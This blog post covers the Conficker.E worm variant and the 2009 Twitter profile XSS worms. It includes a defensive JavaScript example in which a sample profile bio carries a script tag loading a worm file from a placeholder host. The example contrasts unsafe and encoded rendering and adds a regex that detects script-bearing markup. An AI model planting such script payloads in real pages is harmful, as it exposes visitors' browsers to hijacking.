Worms, worms and more worms…


It’s been a busy week for the virus creators and the antivirus companies.  And we’re all the collateral damage.  On April 8, Conficker finally got the update that the world was dreading 8 days earlier.  As you know, the Internet didn’t end though.  Then over the Easter weekend, Twitter was attacked by a worm (along with a series of copycats the next day).

Conficker:

According to F-Secure’s weblog, Conficker.E appeared on April 8.  Some of the highlights of the new variant are:

  • It coexists along with Conficker.C (meaning you can be infected with both variants).
  • It was spread via the P2P network (not the domains that Conficker.C was checking).
  • It reintroduced spreading through the MS08-067 security hole, which had been removed from Conficker.C.  Apparently enough people STILL HAVE NOT PATCHED this hole that it’s a viable method of spreading.
  • It doesn’t use domain name generation.
  • There are possible connections to Waledac and rogue antispyware/antivirus products, because Conficker.C computers have been connecting to domains that host that malware and downloading it.  Or the connection could simply be that the malware downloaded automatically when the infected machines reached the website (kind of like it does when WE go there).
  • On May 3, 2009 Conficker.E will remove itself.  However, it will leave Conficker.C on the computers.

Why the creators went this route, no one’s sure.  It could be that they are playing with the security researchers (kind of saying “We’re learning and adapting to whatever you do.”), or they are just using this as a test run to see what their options are.

Either way, update your antivirus and patch your systems.  MS08-067 has been out since October of 2008.  There is NO excuse for not having the patch installed by now.

Twitter Worms:

Over the Easter weekend, one of Twitter’s competitors discovered a new way of promoting his site.  He found a security vulnerability in how Twitter handles profiles and, using JavaScript obfuscation, used it to spread links to his site throughout twitterland.  The next day, he openly admitted what he did.

Now, there are copycats of his worm that are infecting profiles.  As of right now, they’re just pushing links out to anyone who views the profiles, but that doesn’t mean that they can’t or won’t do something more.

JavaScript obfuscation is a fancy way of saying that they’re hiding the commands in a way that antivirus and antispyware won’t easily catch.  And because there are so many ways of hiding a command, the usual detection methods (matching a set pattern or signature) don’t work.  The actual worm is an XSS (Cross-Site Scripting) worm, which means that when you view one site (here, an infected Twitter profile), your browser runs JavaScript that pulls in commands from another site as well.
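To show why script placed in a profile field ends up running in every visitor’s browser, and what stops it, here is an added example (my own illustration, not code from the post or from Twitter).  It renders a constructed, hypothetical profile two ways: once by dropping the bio straight into the page markup, and once after HTML-encoding it.  The script tag in the sample bio points at a placeholder host (example.invalid) and does nothing; the point is only that the unsafe renderer forwards it verbatim while the safe one turns it into harmless text.  A small defender-side check then flags any rendered markup that still carries active script constructs.

```javascript
// Added example (not from the original post): why a stored XSS worm in a
// profile field works and how output encoding neutralises it.
// Runs under Node.js with no DOM required.

// Characters that must be encoded before untrusted text is placed inside an
// HTML element body or a double-quoted attribute.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the profile bio is concatenated straight into the page,
// so whatever one user typed becomes part of the HTML every visitor loads.
function renderProfileUnsafe(profile) {
  return `<div class="bio">${profile.bio}</div>`;
}

// Hardened pattern: the same field is encoded first, so a <script> tag in the
// bio is displayed as literal text instead of executed by the visitor's browser.
function renderProfileSafe(profile) {
  return `<div class="bio">${escapeHtml(profile.bio)}</div>`;
}

// Defender-side check: does the rendered markup still contain script-bearing
// constructs (script tags, inline event handlers, javascript: URLs)?
// This is an output-side sanity check; a real site validates on write as well.
const SCRIPT_MARKERS = /<\s*script\b|\bon[a-z]+\s*=|javascript\s*:/i;

function containsActiveContent(html) {
  return SCRIPT_MARKERS.test(html);
}

// Constructed sample profile (hypothetical user, not a real account).
// The script src is a placeholder host that resolves to nothing.
const SAMPLE_PROFILE = {
  name: 'sample_user',
  bio: 'Hi there <script src="http://example.invalid/worm.js"></script>',
};

// Renders the sample both ways and reports whether each result is flagged.
function demo() {
  const unsafe = renderProfileUnsafe(SAMPLE_PROFILE);
  const safe = renderProfileSafe(SAMPLE_PROFILE);
  return {
    unsafe,
    safe,
    unsafeHasScript: containsActiveContent(unsafe), // true: script forwarded as-is
    safeHasScript: containsActiveContent(safe),     // false: encoded to plain text
  };
}

const result = demo();
console.log('unsafe render :', result.unsafe);
console.log('safe render   :', result.safe);
console.log('unsafe flagged:', result.unsafeHasScript, ' safe flagged:', result.safeHasScript);
```

The encoding step is the actual fix: once the bio is treated as data rather than markup, obfuscating the script makes no difference, because nothing in it is ever handed to the JavaScript engine.  The regex check is deliberately simple and exists to demonstrate the contrast, not to stand in for proper encoding.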

For now, the recommended precautions are to use Firefox with the NoScript add-on installed (as this blocks all scripts, including the JavaScript worms), and don’t surf profiles on Twitter.  Most importantly, don’t click on any links in tweets, replies, or direct messages.  Hopefully Twitter will have this hole closed up soon.

If you’re a Twitter user, I would add “twitter” to your following list.  That way you can keep up to speed on what’s happening.

As I hear more, I’ll post more.  Have a great day:)

Patrick.
